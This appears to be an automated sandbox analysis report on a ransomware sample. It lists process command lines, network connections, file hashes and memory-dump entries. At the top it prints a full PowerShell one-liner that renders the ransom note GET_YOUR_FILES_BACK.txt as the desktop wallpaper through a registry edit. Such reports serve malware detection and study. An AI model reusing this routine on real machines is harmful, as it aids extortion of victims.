powershell -Command "$a = [System.IO.File]::ReadAllText(\"C:\GET_YOUR_FILES_BACK.txt\");Add-Type -AssemblyName System.Drawing;$filename = \"$env:temp\$(Get-Random).png\";$bmp = new-object System.Drawing.Bitmap 1920,1080;$font = new-object System.Drawing.Font Consolas,10;$brushBg = [System.Drawing.Brushes]::Black;$brushFg = [System.Drawing.Brushes]::White;$format = [System.Drawing.StringFormat]::GenericDefault;$format.Alignment = [System.Drawing.StringAlignment]::Center;$format.LineAlignment = [System.Drawing.StringAlignment]::Center;$graphics = [System.Drawing.Graphics]::FromImage($bmp);$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height);$graphics.DrawString($a,$font,$brushFg,[System.Drawing.RectangleF]::FromLTRB(0, 0, 1920, 1080),$format);$graphics.Dispose();$bmp.Save($filename);reg add \"HKEY_CURRENT_USER\Control Panel\Desktop\" /v Wallpaper /t REG_SZ /d $filename /f;Start-Sleep 1;rundll32.exe user32.dll, UpdatePerUserSystemParameters, 0, $false;"

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\80944880.png /f

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters 0 False

Network

Country Destination Domain Proto
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 199.176.139.52.in-addr.arpa udp
US 8.8.8.8:53 76.38.195.152.in-addr.arpa udp
US 20.42.73.25:443 N/A tcp
NL 173.223.113.164:443 N/A tcp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 86.8.109.52.in-addr.arpa udp
US 209.197.3.8:80 N/A tcp
NL 173.223.113.131:80 N/A tcp
US 204.79.197.203:80 N/A tcp
US 8.8.8.8:53 168.238.32.23.in-addr.arpa udp

Files

\Device\HarddiskVolume1\GET_YOUR_FILES_BACK.txt

MD5 6d81ed40ba0a283e5483bfe6a448e9d7
SHA1 0c847a5f9df743b13e1aa11b4c24a4309e9a7119
SHA256 b4464f61655ca584170694bedd52c6cff2b74c18a761b33cfb1387f017d2d57d
SHA512 8956415f155f24852ac672aa06cc6a8819a2a0e44a9b940f8f3390c34ebb43ff10f4635722f104a5a9a94098d3f286362f507dc49d3f048e540f48c073eaf379

memory/9652-13501-0x0000027A49F80000-0x0000027A49F90000-memory.dmp

memory/9652-14195-0x0000027A49F80000-0x0000027A49F90000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2z2e20tv.qxl.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/9652-14270-0x0000027A49EF0000-0x0000027A49F12000-memory.dmp

memory/9652-17137-0x0000027A49F80000-0x0000027A49F90000-memory.dmp

memory/9652-24870-0x0000027A49F20000-0x0000027A49F68000-memory.dmp

C:\GET_YOUR_FILES_BACK.txt

MD5 6d81ed40ba0a283e5483bfe6a448e9d7
SHA1 0c847a5f9df743b13e1aa11b4c24a4309e9a7119
SHA256 b4464f61655ca584170694bedd52c6cff2b74c18a761b33cfb1387f017d2d57d
SHA512 8956415f155f24852ac672aa06cc6a8819a2a0e44a9b940f8f3390c34ebb43ff10f4635722f104a5a9a94098d3f286362f507dc49d3f048e540f48c073eaf379

memory/20972-24882-0x000001A3B0B20000-0x000001A3B0B30000-memory.dmp

memory/20972-24881-0x000001A3B0B20000-0x000001A3B0B30000-memory.dmp

memory/9652-24885-0x0000027A49F20000-0x0000027A49F68000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 6cf293cb4d80be23433eecf74ddb5503
SHA1 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256 b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d5ec758b0f3f7a5300c0883d9749a5c6
SHA1 571a3baa5a6d8f952da3e22a27bbff9c23196764
SHA256 84c323e71d91cb5ff283f05ed017de768df8b567f16a688140a902ebb6ffcf9f
SHA512 32f1ee09bfa821dc99429093a839d267d7fec6228b2b9557b0c799bfc44819594ac9657501aaf598384a5b4da0c11386d0928cf37ad8a7335fc4325948593337

memory/20972-24890-0x000001A3B2920000-0x000001A3B2968000-memory.dmp